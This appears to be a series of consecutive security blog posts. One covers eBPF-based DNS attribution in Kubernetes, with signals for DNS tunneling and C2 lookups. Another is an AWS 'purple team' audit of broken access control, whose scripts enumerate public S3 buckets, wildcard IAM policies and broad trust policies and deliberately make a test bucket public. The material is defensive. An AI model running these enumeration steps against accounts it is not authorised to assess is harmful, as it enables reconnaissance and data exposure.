coredns              1842   DNS query (UDP sendto)   # ← CoreDNS forwarding upstream
nginx                9231   DNS query (UDP sendto)   # ← nginx resolving upstream
payment-svc          11043  DNS query (UDP sendto)   # ← your service making queries
curl                 14829  DNS query (UDP sendto)   # ← kubectl exec / debug session
# How many DNS queries per process in the last 30 seconds?
bpftrace -e '
tracepoint:syscalls:sys_enter_sendto {
    $port = (uint16)((uint8*)args->addr)[3] << 8 |
            (uint16)((uint8*)args->addr)[2];
    if ($port == 53) { @dns_queries[comm] = count(); }
}
interval:s:30 { print(@dns_queries); exit(); }
'

Expected output:

@dns_queries[coredns]:       1203   # ← upstream forwarder traffic
@dns_queries[payment-svc]:    847   # ← legitimate service queries
@dns_queries[unknown]:         12   # ← investigate this one

On EKS or GKE managed nodes: You may not be able to SSH directly to worker nodes, but you can run a privileged debug pod: kubectl debug node/<node-name> -it --image=quay.io/iovisor/bpftrace. The bpftrace program runs on the host kernel and sees all pods’ DNS queries. GKE Autopilot restricts privileged pods — use GKE’s built-in eBPF-based DNS observability instead (enabled via Cloud Logging with DNS policy logging).


A security scan flagged unexpected DNS queries from payment-svc in the production namespace. The query domains didn’t match anything in the service’s known dependency list. The scan tool showed the traffic on the wire — destination port 53, from the pod’s IP — but couldn’t tell us which process inside the pod was responsible or what domain was being queried without pulling the pod’s DNS logs.

The pod had no DNS logging enabled. CoreDNS showed the queries in its aggregate metrics but with no attribution below namespace level. Restarting the pod to add a DNS sidecar would wipe any in-memory state the process had accumulated.

I ran bpftrace with a recvfrom hook to catch the DNS response payloads coming back into the pod:

bpftrace -e '
tracepoint:syscalls:sys_exit_recvfrom {
    if (retval > 0) {
        printf("%-20s PID %-6d received %d bytes (possible DNS response)\n",
               comm, pid, retval);
    }
}' --timeout 60

Then cross-referenced the PIDs to container processes via /proc/<pid>/cgroup. The unexpected queries were coming from a sidecar process that had been injected by a recent Helm chart change — not from the main application container at all. A misconfigured Datadog agent injected into the wrong namespace was querying its intake endpoint.

No restart. No sidecar deployment. Found in under two minutes.


Why CoreDNS Metrics Don’t Give You This

CoreDNS exposes DNS query metrics via Prometheus. Those metrics tell you:
– Total queries per second across the cluster
– Query latency histograms
– Error rates (NXDOMAIN, SERVFAIL)
– Upstream forwarder health

What they don’t tell you:
– Which specific pod sent a query to a specific domain
– Which process inside that pod made the getaddrinfo() call
– Whether the query came from the main container or an injected sidecar
– The timing relationship between a DNS query and the connection that followed it

CoreDNS sees the query after it arrives at the resolver. eBPF tracepoints see the query at the moment the pod’s process issues the sendto() syscall — before it leaves the node. The difference is attribution.


The DNS Syscall Path in Linux

Understanding where the hook fires helps you reason about what you can observe:

Application code
    ↓
getaddrinfo("api.example.com") ← glibc resolver function
    ↓
glibc reads /etc/resolv.conf → finds nameserver 10.96.0.10 (CoreDNS ClusterIP)
    ↓
glibc builds DNS wire-format query packet
    ↓
sendto(sockfd, buf, len, 0, &resolver_addr, addrlen)
    ↓                     ← eBPF tracepoint fires here: sys_enter_sendto
Linux kernel: udp_sendmsg()
    ↓
Packet leaves pod veth interface
    ↓
TC eBPF on veth sees UDP packet (flow telemetry picks this up too)
    ↓
CoreDNS receives query, resolves, sends response
    ↓
Packet arrives back at pod veth
    ↓
recvfrom(sockfd, buf, len, 0, &src_addr, &src_len)
    ↓                     ← eBPF tracepoint fires here: sys_exit_recvfrom
glibc parses DNS response
    ↓
getaddrinfo() returns IP addresses to application

getaddrinfo — the standard POSIX function applications call to resolve a hostname to IP addresses. It lives in glibc, not in the kernel. The kernel never sees the domain name string directly — it only sees the UDP packet carrying the DNS wire-format query. To read the actual domain name in an eBPF program, you parse the DNS packet payload at the sendto tracepoint.

tracepoint — a stable, versioned hook deliberately placed in Linux kernel source code by kernel developers. Unlike kprobes (which attach to arbitrary kernel functions and break when those functions change), tracepoints are part of the kernel’s stable interface. The syscalls:sys_enter_sendto tracepoint has been present and stable since kernel 3.x. You can rely on it across Ubuntu 20.04 through the latest kernels without version checks.


Reading DNS Queries at the Tracepoint

The sendto tracepoint fires when any process sends data on a socket. Filtering to port 53 gives you DNS queries. Parsing the payload gives you the domain name.

The DNS wire format for a query:

Bytes 0-11:   DNS header (12 bytes)
              - Transaction ID (2 bytes)
              - Flags (2 bytes)
              - QDCount, ANCount, NSCount, ARCount (2 bytes each)
Byte 12+:     Question section
              - QNAME (variable length, label-encoded)
              - QTYPE (2 bytes)
              - QCLASS (2 bytes)

The QNAME is length-prefixed labels: \x03api\x07example\x03com\x00 for api.example.com. bpftrace can read the raw bytes but parsing label encoding inline in a one-liner is awkward. For raw query detection (flag any DNS query from a specific process), the tracepoint is enough:

# Watch DNS queries from a specific process name — replace "payment-svc"
bpftrace -e '
tracepoint:syscalls:sys_enter_sendto /comm == "payment-svc"/ {
    printf("PID %-6d sending %d bytes to DNS\n", pid, args->len);
}
'

For full domain name extraction, use a tool that implements DNS wire-format parsing in its eBPF layer. Tetragon and Pixie both do this. On a Tetragon-instrumented cluster:

# Watch DNS queries with domain names — Tetragon (all pods)
kubectl exec -n kube-system -it $(kubectl get pod -n kube-system -l app.kubernetes.io/name=tetragon -o name | head -1) \
  -- tetra getevents --event-types PROCESS_KPROBE \
  | grep -i dns

Sample Tetragon output:

{
  "process": {
    "pod": {"name": "payment-svc-7d4b9f-xk2p1", "namespace": "production"},
    "binary": "/usr/bin/payment-service",
    "pid": 11043
  },
  "function_name": "__sys_sendto",
  "args": [
    {"sock_arg": {"family": "AF_INET", "protocol": "UDP",
                  "daddr": "10.96.0.10", "dport": 53}},
    {"bytes_arg": "<DNS query for metrics.datadoghq.com>"}
  ]
}

Pod name, namespace, binary, PID, and the domain being queried — all from a kernel tracepoint, no sidecar, no pod restart.


Building Pod-Level DNS Attribution Without Tetragon

If you’re not running Tetragon, you can build pod-level attribution from the PID. When bpftrace reports a PID making a DNS query, map it to a container:

# Get the PID from bpftrace, then:
PID=11043

# Which cgroup does this PID belong to? (maps to container/pod)
cat /proc/$PID/cgroup | grep kubepods
# 12:cpu:/kubepods/burstable/pod3f8a21bc-4e7d-4b91-a3c2-8b947f6e3d12/a4c8f1e2b3d4...
# The pod UID is embedded: pod3f8a21bc-4e7d-4b91-a3c2-8b947f6e3d12

# Map pod UID to pod name
kubectl get pods -A -o jsonpath='{range .items[*]}{.metadata.uid}{" "}{.metadata.name}{" "}{.metadata.namespace}{"\n"}{end}' \
  | grep 3f8a21bc-4e7d-4b91-a3c2-8b947f6e3d12
# 3f8a21bc-4e7d-4b91-a3c2-8b947f6e3d12  payment-svc-7d4b9f-xk2p1  production

That’s the full chain: kernel tracepoint → host PID → cgroup path → pod UID → pod name + namespace. Automatable. No agents required inside the pod.


Detecting Anomalous DNS: What to Watch For

DNS is the first observable action in most attack chains. A process that has been compromised or injected typically cannot establish a C2 connection without first resolving the C2 domain.

Signals worth watching at the kernel DNS layer:

Queries to non-cluster domains from unexpected processes

# Flag any DNS query to a non-cluster domain (not .cluster.local or .svc.cluster.local)
bpftrace -e '
tracepoint:syscalls:sys_enter_sendto {
    $port = (uint16)((uint8*)args->addr)[3] << 8 |
            (uint16)((uint8*)args->addr)[2];
    if ($port == 53) {
        printf("%-20s %-6d DNS sendto\n", comm, pid);
    }
}' --timeout 60

High-frequency DNS queries from a single process (DNS tunneling fingerprint)

# Processes making more than N DNS queries per second
bpftrace -e '
tracepoint:syscalls:sys_enter_sendto {
    $port = (uint16)((uint8*)args->addr)[3] << 8 |
            (uint16)((uint8*)args->addr)[2];
    if ($port == 53) { @[pid, comm] = count(); }
}
interval:s:1 {
    print(@);
    clear(@);
}
'

DNS tunneling exfiltrates data by encoding it in subdomains of queries. A process making 50+ DNS queries per second to varied subdomains of the same parent domain is a strong signal. CoreDNS aggregate metrics will show elevated query volume; the kernel tracepoint tells you which PID is responsible.

Queries immediately followed by a connection (normal vs anomalous pattern)

Legitimate services resolve a known set of domains. A process that resolves a new, never-before-seen domain and immediately opens a TCP connection to the returned IP is structurally different from normal service behavior. The combination of DNS tracepoint + TCP connect kprobe lets you correlate these events by PID and timestamp — without any application instrumentation.


⚠ Production Gotchas

DNS payload parsing is not trivial in bpftrace. Reading the domain name from the UDP payload requires byte-level parsing of the DNS wire format inside an eBPF program. bpftrace can read raw bytes with buf(), but the label-encoded domain name format requires a loop that the verifier may reject for complexity reasons. Tools like Tetragon and Pixie implement this parsing in C within their eBPF programs where they have more control over verifier limits. For raw detection (flag DNS queries from unexpected processes), the sendto tracepoint without payload parsing is enough.

sendto fires for all UDP, not just DNS. Filter on the destination port. The destination address structure is at args->addr — port is in network byte order at bytes 2–3 of the sockaddr_in structure. The filtering in the examples above is correct for port 53; double-check if you’re on a cluster that uses a non-standard DNS port.

CoreDNS pods will appear in your DNS query trace — that’s expected. CoreDNS makes upstream DNS queries to resolve non-cluster domains. Filter on namespace/cgroup if you want to exclude CoreDNS from your trace.

DNS over TCP is a separate code path. Most DNS queries are UDP. Large responses (>512 bytes) or DNSSEC responses may trigger TCP fallback. The sendto tracepoint catches UDP; for TCP DNS, you’d need tcp_sendmsg with port 53 filtering. In practice, within-cluster DNS resolution is almost entirely UDP.

glibc caching means not every getaddrinfo() generates a DNS query. glibc caches resolved hostnames in the process’s memory. A service that calls getaddrinfo("api.example.com") every 100ms may only generate a DNS query every 30 seconds (the TTL). If you’re looking for which pods are resolving a domain and see only occasional tracepoint hits, that’s expected — it’s the cache miss rate, not the access rate.


Quick Reference

What you want Command
All DNS queries on a node bpftrace -e 'tracepoint:syscalls:sys_enter_sendto { if (port == 53) ... }'
DNS query count per process bpftrace -e '... { @[comm] = count(); }'
DNS queries from a specific process bpftrace -e '... /comm == "my-svc"/ { ... }'
Map PID to pod cat /proc/<pid>/cgroup → extract pod UID → kubectl get pods
DNS events with domain names (Tetragon) tetra getevents --event-types PROCESS_KPROBE
DNS policy violations (Cilium) hubble observe --verdict DROPPED --protocol DNS
CoreDNS query logs kubectl logs -n kube-system -l k8s-app=kube-dns
DNS signal What it indicates
New domain, immediate TCP connect Possible C2 resolution
50+ queries/second from one PID DNS tunneling candidate
Query to non-cluster domain from batch job Unusual — investigate
NXDOMAIN responses at high rate Misconfiguration or DGA
Queries from PID not matching any known binary Injected process

Key Takeaways

  • DNS observability in Kubernetes with eBPF uses the sendto tracepoint — the hook fires when the process issues the syscall, before the packet leaves the node, giving you PID-level attribution with no sidecar
  • CoreDNS metrics show aggregate DNS health; kernel tracepoints show which pod and which process made each query — the attribution gap between the two is where anomaly detection lives
  • The DNS syscall path goes: getaddrinfo() → glibc → sendto() syscall → kernel UDP stack → CoreDNS. eBPF hooks fire at the sendto() boundary
  • A compromised workload’s first observable action is almost always a DNS query; tracepoint-based DNS observability catches it at the kernel level, ahead of any application log
  • glibc caches resolved names, so tracepoint hit rate reflects cache misses, not getaddrinfo() call rate — account for this when baselining
  • Full domain name extraction requires DNS wire-format parsing; Tetragon and Pixie do this in their eBPF programs; bpftrace one-liners detect the query event without the domain string

What’s Next

DNS observability tells you what a workload is resolving. EP12 answers what happens when you want to stop a workload from doing something — not detect it after the fact, but prevent it at the syscall boundary before it completes.

LSM hooks and Tetragon’s kill path enforce at the kernel level. When the kernel enforces, the process never gets the return value from the syscall. There is no “detect and respond” window — the action simply does not complete. That is a structurally different security posture from anything a sidecar or userspace agent can provide.

Next: LSM and Tetragon — when the kernel says no

Get EP12 in your inbox when it publishes → linuxcent.com/subscribe

Broken Access Control in AWS: From Misconfigured S3 to Admin

Reading Time: 9 minutes

What is purple team securityOWASP Top 10 mapped to cloud infrastructureCloud security breaches 2020–2025Broken access control in AWS


TL;DR

  • Broken access control in AWS is OWASP A01 — the most common cloud security failure, covering IAM wildcards, public S3 buckets, and overly broad trust policies
  • A public S3 bucket containing 47 million customer records went undetected for six months in an authorized assessment — no GuardDuty finding, no AWS Config alert, because those controls weren’t enabled
  • The red phase: three commands to identify public buckets, enumerate IAM over-permissions, and test trust policy abuse — all with read-only access on your own account
  • The blue phase: two AWS Config managed rules and one GuardDuty finding type that cover the majority of A01 findings
  • The purple phase: deny-based SCPs, bucket public access blocks, and IAM Access Analyzer — structural controls, not monitoring alerts
  • Cross-series: IAM privilege escalation paths (IAM EP08) and AWS least privilege audit (IAM EP09) go deeper on the IAM layer

OWASP Mapping: A01 Broken Access Control — primarily. A09 Logging and Monitoring Failures — the six-month detection gap demonstrates A09 as an amplifier of A01.


The Big Picture

┌─────────────────────────────────────────────────────────────────────┐
│              BROKEN ACCESS CONTROL — ATTACK SURFACE                 │
│                                                                     │
│   INTERNET                    AWS ACCOUNT                           │
│                                                                     │
│   Attacker ──────────────▶  S3 bucket (public read)                 │
│                             └── 47M customer records                │
│                                                                     │
│   Attacker ──────────────▶  IAM user with "Action": "*"             │
│   (compromised creds)        └── escalate → admin access            │
│                                                                     │
│   Attacker ──────────────▶  Trust policy: "AWS": "*"                │
│   (any AWS account)          └── assume role from attacker's        │
│                                  account                            │
│                                                                     │
│   ═══════════════════════════════════════════════════════           │
│                                                                     │
│   DETECTION GAPS (A09 amplifying A01):                              │
│   • S3 public access not in AWS Config rules                        │
│   • GuardDuty not enabled                                           │
│   • No IAM Access Analyzer                                          │
│   • No SCP boundary on public bucket creation                       │
│                                                                     │
└─────────────────────────────────────────────────────────────────────┘

Broken access control in AWS is the infrastructure equivalent of OWASP A01: a principal can reach a resource it should not be able to reach, because the access control decision was either not made or made incorrectly. In the cloud context, this manifests as public S3 buckets, IAM policies with wildcard actions and resources, and trust policies that allow any principal rather than a specific, scoped entity.


The Assessment That Changed My Approach to Access Control Auditing

During an authorized assessment, I found an S3 bucket containing 47 million customer records. The bucket name was generic — no obvious PII signal in the name itself. It was created two years prior by an engineer who was troubleshooting a data pipeline and needed temporary public access to share data with an external partner. The partner relationship ended. The bucket access was never reverted.

The bucket had been public for six months at the time I found it. I checked the AWS Config rules: S3 public access was not in the rule set. GuardDuty was enabled but no finding had fired — GuardDuty generates a Policy:S3/BucketAnonymousAccessGranted finding when public access is enabled, but only if the finding is new during GuardDuty’s monitoring window. The bucket went public before GuardDuty was enabled.

No alert ever fired. Not because the tools couldn’t detect it — because the tools weren’t configured to look.

This is A01 amplified by A09. The broken access control is the public bucket. The six-month window is the logging and monitoring failure.


Red Phase: How Broken Access Control Works in Practice

The red team perspective on broken access control starts with enumeration. What can this principal reach that it shouldn’t be able to reach?

Enumerating Public S3 Buckets

aws s3api list-buckets --query 'Buckets[].Name' --output text | \
  tr '\t' '\n' | \
  while read bucket; do
    # Check account-level block
    account_block=$(aws s3control get-public-access-block \
      --account-id $(aws sts get-caller-identity --query Account --output text) \
      2>/dev/null | jq -r '.PublicAccessBlockConfiguration.BlockPublicAcls')

    # Check bucket-level policy
    policy=$(aws s3api get-bucket-policy-status --bucket "$bucket" 2>/dev/null | \
      jq -r '.PolicyStatus.IsPublic')

    # Check bucket ACL
    acl=$(aws s3api get-bucket-acl --bucket "$bucket" 2>/dev/null | \
      jq -r '.Grants[] | select(.Grantee.URI == "http://acs.amazonaws.com/groups/global/AllUsers") | .Permission')

    if [ "$policy" = "true" ] || [ -n "$acl" ]; then
      echo "PUBLIC BUCKET: $bucket (policy_public=$policy, acl_grants=$acl)"
    fi
  done

Enumerating Overly Permissive IAM Policies

# Find all customer-managed policies with wildcard actions
aws iam list-policies --scope Local --query 'Policies[].Arn' --output text | \
  tr '\t' '\n' | \
  while read arn; do
    version=$(aws iam get-policy --policy-arn "$arn" \
      --query 'Policy.DefaultVersionId' --output text)
    doc=$(aws iam get-policy-version --policy-arn "$arn" --version-id "$version" \
      --query 'PolicyVersion.Document' --output json)

    if echo "$doc" | jq -e '.Statement[] | select(.Effect == "Allow" and .Action == "*")' > /dev/null 2>&1; then
      echo "WILDCARD ACTION POLICY: $arn"
      echo "$doc" | jq '.Statement[] | select(.Effect == "Allow" and .Action == "*")'
    fi
  done

Testing Trust Policy Abuse

# Find IAM roles with overly broad trust policies
# Specifically: trust policies that allow any AWS account or service
aws iam list-roles --query 'Roles[].{Name:RoleName,Arn:Arn}' --output json | \
  jq -r '.[].Arn' | \
  while read role_arn; do
    trust=$(aws iam get-role --role-name "$(basename $role_arn)" \
      --query 'Role.AssumeRolePolicyDocument' --output json 2>/dev/null)

    # Check for wildcard principals
    if echo "$trust" | jq -e '.Statement[] | select(.Principal == "*")' > /dev/null 2>&1; then
      echo "WILDCARD TRUST PRINCIPAL: $role_arn"
    fi

    # Check for cross-account trust without conditions
    if echo "$trust" | jq -e '.Statement[] | select(.Principal.AWS | type == "string" and test("arn:aws:iam::[0-9]+:root"))' > /dev/null 2>&1; then
      account_in_trust=$(echo "$trust" | jq -r '.Statement[] | .Principal.AWS // empty' | grep -oP '(?<=arn:aws:iam::)[0-9]+')
      current_account=$(aws sts get-caller-identity --query Account --output text)
      if [ "$account_in_trust" != "$current_account" ]; then
        echo "CROSS-ACCOUNT TRUST (verify scope): $role_arn trusts account $account_in_trust"
      fi
    fi
  done

Simulating S3 Exfiltration (on your own bucket — safe test)

# Create a test bucket, make it public, verify it's accessible without credentials
# Do this in a non-production account only

TEST_BUCKET="purple-team-test-$(date +%s)"
aws s3 mb s3://${TEST_BUCKET} --region us-east-1

# Disable the public access block (simulates the misconfiguration)
aws s3api put-public-access-block \
  --bucket "${TEST_BUCKET}" \
  --public-access-block-configuration \
  "BlockPublicAcls=false,IgnorePublicAcls=false,BlockPublicPolicy=false,RestrictPublicBuckets=false"

# Add a public-read bucket policy
aws s3api put-bucket-policy --bucket "${TEST_BUCKET}" --policy '{
  "Version": "2012-10-17",
  "Statement": [{
    "Effect": "Allow",
    "Principal": "*",
    "Action": "s3:GetObject",
    "Resource": "arn:aws:s3:::'"${TEST_BUCKET}"'/*"
  }]
}'

# Put a test file
echo "PURPLE_TEAM_TEST_DATA" | aws s3 cp - s3://${TEST_BUCKET}/test.txt

# Verify it's accessible without credentials
curl -s "https://${TEST_BUCKET}.s3.amazonaws.com/test.txt"
# Should return: PURPLE_TEAM_TEST_DATA

echo ""
echo "Test complete. Clean up:"
echo "aws s3 rb s3://${TEST_BUCKET} --force"

Blue Phase: What Detection Looks Like

What AWS Config Catches

Two managed rules cover the majority of S3 broken access control findings:

# Enable the S3 public access rules in AWS Config
# (requires Config to already be enabled)

# Rule 1: s3-bucket-public-read-prohibited
aws configservice put-config-rule --config-rule '{
  "ConfigRuleName": "s3-bucket-public-read-prohibited",
  "Source": {
    "Owner": "AWS",
    "SourceIdentifier": "S3_BUCKET_PUBLIC_READ_PROHIBITED"
  },
  "Scope": {
    "ComplianceResourceTypes": ["AWS::S3::Bucket"]
  }
}'

# Rule 2: s3-account-level-public-access-blocks-periodic
aws configservice put-config-rule --config-rule '{
  "ConfigRuleName": "s3-account-level-public-access-blocks-periodic",
  "Source": {
    "Owner": "AWS",
    "SourceIdentifier": "S3_ACCOUNT_LEVEL_PUBLIC_ACCESS_BLOCKS_PERIODIC"
  }
}'

# Check current compliance status
aws configservice describe-compliance-by-config-rule \
  --config-rule-names s3-bucket-public-read-prohibited \
  --query 'ComplianceByConfigRules[].{Rule:ConfigRuleName,Compliance:Compliance.ComplianceType}'

What GuardDuty Catches

GuardDuty generates these findings for S3 broken access control:

Finding Type Trigger Severity
Policy:S3/BucketAnonymousAccessGranted Bucket policy or ACL grants public read/write Medium
Policy:S3/BucketPublicAccessGranted Same as above — alternate finding type Medium
Discovery:S3/MaliciousIPCaller S3 GetObject from a known malicious IP High
# Query GuardDuty findings for S3 public access violations
DETECTOR_ID=$(aws guardduty list-detectors --query 'DetectorIds[0]' --output text)

aws guardduty list-findings \
  --detector-id "${DETECTOR_ID}" \
  --finding-criteria '{
    "Criterion": {
      "type": {
        "Equals": ["Policy:S3/BucketAnonymousAccessGranted", "Policy:S3/BucketPublicAccessGranted"]
      }
    }
  }' \
  --query 'FindingIds' --output text | \
  xargs -n 10 aws guardduty get-findings \
    --detector-id "${DETECTOR_ID}" \
    --finding-ids | \
  jq '.Findings[] | {type: .Type, bucket: .Resource.S3BucketDetails[0].Name, severity: .Severity}'

What IAM Access Analyzer Catches

IAM Access Analyzer continuously analyzes resource policies for external access — S3 buckets, IAM roles, KMS keys, SQS queues, Lambda functions. It generates a finding any time a resource policy grants access to a principal outside the AWS account (or AWS Organization boundary).

# Enable IAM Access Analyzer for the account
aws accessanalyzer create-analyzer \
  --analyzer-name "account-access-analyzer" \
  --type ACCOUNT

# List all active findings (external access granted)
aws accessanalyzer list-findings \
  --analyzer-arn $(aws accessanalyzer list-analyzers --query 'analyzers[0].arn' --output text) \
  --filter '{"status": {"eq": ["ACTIVE"]}}' \
  --query 'findings[].{Resource:resource,Principal:principal,Action:action}' \
  --output table

What the CloudTrail Event Looks Like

When an anonymous user accesses a public S3 object:

{
  "eventVersion": "1.09",
  "userIdentity": {
    "type": "AWSAccount",
    "accountId": "ANONYMOUS_PRINCIPAL",  
    "principalId": "ANONYMOUS_PRINCIPAL"
  },
  "eventTime": "2024-03-15T02:47:00Z",
  "eventSource": "s3.amazonaws.com",
  "eventName": "GetObject",
  "requestParameters": {
    "bucketName": "your-bucket-name",
    "key": "customer-data/records.csv"
  },
  "sourceIPAddress": "198.51.100.1",
  "userAgent": "python-requests/2.28.0"
}

The signal: userIdentity.type = "AWSAccount" with accountId = "ANONYMOUS_PRINCIPAL" on a GetObject event. This is a read from an anonymous, unauthenticated principal.

# CloudTrail Insights query (Athena) to find anonymous S3 GetObject events
# Assumes CloudTrail S3 data events are enabled for the bucket

SELECT
  eventTime,
  sourceIPAddress,
  requestParameters.bucketName,
  requestParameters.key,
  userIdentity.type,
  userIdentity.accountId
FROM cloudtrail_logs
WHERE
  eventName = 'GetObject'
  AND userIdentity.type = 'AWSAccount'
  AND userIdentity.accountId = 'ANONYMOUS_PRINCIPAL'
  AND eventTime > current_timestamp - interval '7' day
ORDER BY eventTime DESC
LIMIT 100;

Purple Phase: The Structural Fix

Detection catches broken access control after the fact. The structural fix prevents it from being possible.

Fix 1: Account-Level S3 Public Access Block

This is a single setting that prevents any bucket in the account from becoming public — regardless of bucket policy or ACL. It overrides bucket-level settings.

# Enable account-level S3 public access block
aws s3control put-public-access-block \
  --account-id $(aws sts get-caller-identity --query Account --output text) \
  --public-access-block-configuration \
  "BlockPublicAcls=true,IgnorePublicAcls=true,BlockPublicPolicy=true,RestrictPublicBuckets=true"

# Verify
aws s3control get-public-access-block \
  --account-id $(aws sts get-caller-identity --query Account --output text)

Fix 2: SCP to Prevent Disabling the Public Access Block

An SCP (Service Control Policy) at the AWS Organizations level that prevents any account from disabling the public access block — even an account administrator.

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "DenyS3PublicAccessBlockDisable",
      "Effect": "Deny",
      "Action": [
        "s3:PutBucketPublicAccessBlock",
        "s3:DeletePublicAccessBlock"
      ],
      "Resource": "*",
      "Condition": {
        "ArnNotLike": {
          "aws:PrincipalArn": "arn:aws:iam::*:role/s3-public-access-exception-role"
        }
      }
    }
  ]
}
# Apply the SCP to your organizational unit
aws organizations create-policy \
  --name "DenyS3PublicAccessBlockDisable" \
  --type SERVICE_CONTROL_POLICY \
  --content file://scp-deny-s3-public-access.json \
  --description "Prevents disabling S3 public access block at account level"

Fix 3: IAM Policy Cleanup — Remove Wildcards

For IAM policies with wildcard actions, the fix is least-privilege replacement. This is not a quick operation — it requires analyzing actual usage and scoping to what is actually needed.

# Use IAM Access Analyzer policy generation to generate a least-privilege policy
# based on actual CloudTrail activity for a role
aws accessanalyzer start-policy-generation \
  --policy-generation-details '{
    "principalArn": "arn:aws:iam::123456789012:role/your-role-name"
  }' \
  --cloud-trail-details '{
    "accessRole": "arn:aws:iam::123456789012:role/access-analyzer-cloudtrail-role",
    "trailProperties": [{
      "cloudTrailArn": "arn:aws:cloudtrail:us-east-1:123456789012:trail/your-trail",
      "regions": ["us-east-1", "us-west-2"],
      "allRegions": false
    }],
    "startTime": "2024-01-01T00:00:00Z",
    "endTime": "2024-03-01T00:00:00Z"
  }'

# Retrieve the generated policy
JOB_ID="<returned-job-id>"
aws accessanalyzer get-generated-policy --job-id "${JOB_ID}"

For a systematic audit approach, the AWS least privilege audit process in IAM EP09 covers how to move from wildcard policies to scoped permissions methodically across a multi-account environment.

Fix 4: IAM Access Analyzer with Automated Archiving

# Create an archive rule for known-good cross-account access
# (prevents alert fatigue from legitimate cross-account patterns)
aws accessanalyzer create-archive-rule \
  --analyzer-name "account-access-analyzer" \
  --rule-name "archive-legitimate-cross-account" \
  --filter '{
    "principal.AWS": {
      "contains": ["arn:aws:iam::111122223333:role/legitimate-cross-account-role"]
    }
  }'

Run This in Your Own Environment: A01 Audit

Run this in any AWS account you own or have read-only access to audit:

#!/bin/bash
# Purple Team EP04 — Broken Access Control (A01) Audit
# Safe to run with read-only IAM permissions

ACCOUNT=$(aws sts get-caller-identity --query Account --output text)
echo "Auditing account: ${ACCOUNT}"
echo "==============================="

echo ""
echo "[A01-1] S3 Account-Level Public Access Block"
aws s3control get-public-access-block --account-id "${ACCOUNT}" 2>/dev/null || \
  echo "  FINDING: Account-level public access block not configured"

echo ""
echo "[A01-2] S3 Buckets with Public Access"
aws s3api list-buckets --query 'Buckets[].Name' --output text | tr '\t' '\n' | \
  while read bucket; do
    status=$(aws s3api get-bucket-policy-status --bucket "$bucket" 2>/dev/null | \
      jq -r '.PolicyStatus.IsPublic // "false"')
    if [ "$status" = "true" ]; then
      echo "  FINDING: Public bucket: $bucket"
    fi
  done

echo ""
echo "[A01-3] IAM Roles with Wildcard Trust Policies"
aws iam list-roles --query 'Roles[].RoleName' --output text | tr '\t' '\n' | head -50 | \
  while read role; do
    trust=$(aws iam get-role --role-name "$role" \
      --query 'Role.AssumeRolePolicyDocument.Statement' 2>/dev/null)
    if echo "$trust" | jq -e '.[] | select(.Principal == "*")' > /dev/null 2>&1; then
      echo "  FINDING: Wildcard trust principal in role: $role"
    fi
  done

echo ""
echo "[A01-4] IAM Access Analyzer — Active External Access Findings"
ANALYZER=$(aws accessanalyzer list-analyzers --query 'analyzers[0].arn' --output text 2>/dev/null)
if [ -z "$ANALYZER" ]; then
  echo "  FINDING: IAM Access Analyzer not enabled"
else
  aws accessanalyzer list-findings \
    --analyzer-arn "${ANALYZER}" \
    --filter '{"status": {"eq": ["ACTIVE"]}}' \
    --query 'findings[].{Resource:resource,Type:resourceType}' \
    --output table
fi

⚠ Common Mistakes When Fixing Broken Access Control in AWS

Fixing the symptom at the bucket level without the account-level block. If you set RestrictPublicBuckets=true on individual buckets but leave the account-level block unset, the next bucket created by another engineer starts with public access possible again. The account-level block is the structural control; the bucket-level setting is defense-in-depth.

Not enabling CloudTrail S3 data events. CloudTrail management events capture bucket creation and policy changes. They do not capture GetObject and PutObject by default — that requires enabling S3 data events, which adds cost. Without data events, you cannot see who accessed what in a public bucket. If you can’t afford data events on all buckets, enable them on buckets containing sensitive data.

Treating IAM Access Analyzer findings as one-time. Access Analyzer runs continuously. A new resource policy that grants external access generates a new finding. If you archive findings without fixing the underlying policy, you lose visibility. Archive only findings that represent intentional, documented cross-account access.

Confusing “no GuardDuty findings” with “no problem.” GuardDuty’s Policy:S3/BucketAnonymousAccessGranted only fires when access is newly granted during GuardDuty’s monitoring window. A bucket that was made public before GuardDuty was enabled will not generate a finding — GuardDuty does not retroactively scan all bucket policies. Use AWS Config for retroactive compliance checks; use GuardDuty for real-time detection of new violations.

For the full IAM attack chain that broken access control enables — including IAM privilege escalation paths via iam:PassRole — see IAM series EP08. The privilege escalation analysis belongs alongside the access control audit.


Quick Reference

Control What It Does AWS Service
Account-level S3 public access block Prevents any bucket from becoming public S3 Control
SCP: deny public access block disable Prevents disabling the account-level block Organizations
AWS Config: S3_BUCKET_PUBLIC_READ_PROHIBITED Flags buckets that are or become public AWS Config
GuardDuty: Policy:S3/BucketAnonymousAccessGranted Detects new public access grants GuardDuty
IAM Access Analyzer Finds all resources with external access grants Access Analyzer
CloudTrail S3 data events Captures GetObject/PutObject for audit CloudTrail
IAM policy generation Generates least-privilege policy from actual usage Access Analyzer

Key Takeaways

  • Broken access control in AWS (OWASP A01) is the most common cloud security failure — IAM wildcards, public S3, and broad trust policies are the three primary manifestations
  • A public S3 bucket with 47 million records was active for six months without a single alert — because the detection controls (AWS Config rules, GuardDuty) weren’t enabled to look for it
  • The structural fix is the account-level S3 public access block enforced by SCP — detection tools catch violations; the SCP prevents the violation from being possible
  • IAM Access Analyzer provides continuous visibility into every resource that grants external access — enable it in every account
  • The red phase can be run with read-only permissions against your own account — the audit script above reveals your current A01 exposure in under five minutes
  • Fixing A01 without enabling the A09 controls (CloudTrail data events, GuardDuty, AWS Config) leaves you blind to whether the fix is working
  • Use Access Analyzer’s policy generation feature to move from wildcard policies to least-privilege without guessing

What’s Next

EP05 covers MFA fatigue attacks — how the Uber and Okta breaches worked at the authentication layer, how to simulate push-notification fatigue in a test environment, and the structural fix: phishing-resistant MFA using FIDO2 hardware keys. The identity layer is where most cloud compromises start — understanding how push MFA fails is the prerequisite for knowing why hardware keys are the only structural answer.

Get EP05 in your inbox when it publishes → subscribe at linuxcent.com

Stratum — OS Hardening as a Platform

Reading Time: 5 minutes

OS Hardening as Code, Episode 6
Cloud AMI Security Risks · Linux Hardening as Code · Multi-Cloud OS Hardening · Automated OpenSCAP Compliance · CI/CD Compliance Gate · Stratum Platform**


TL;DR

  • Stratum is open-source under Apache 2.0 — the engine, blueprint format, scanner, and Pipeline API are all available on GitHub
  • The platform follows the same open-core model as Terraform/OpenTofu and Cilium/Isovalent: OSS core, self-hostable, extendable
  • Three extension points: custom compliance controls, provider plugins (add new cloud providers), pipeline integrations
  • Architecture: Blueprint YAML → Engine → Provider Layer → Ansible-Lockdown → OpenSCAP → Golden Image → Pipeline API
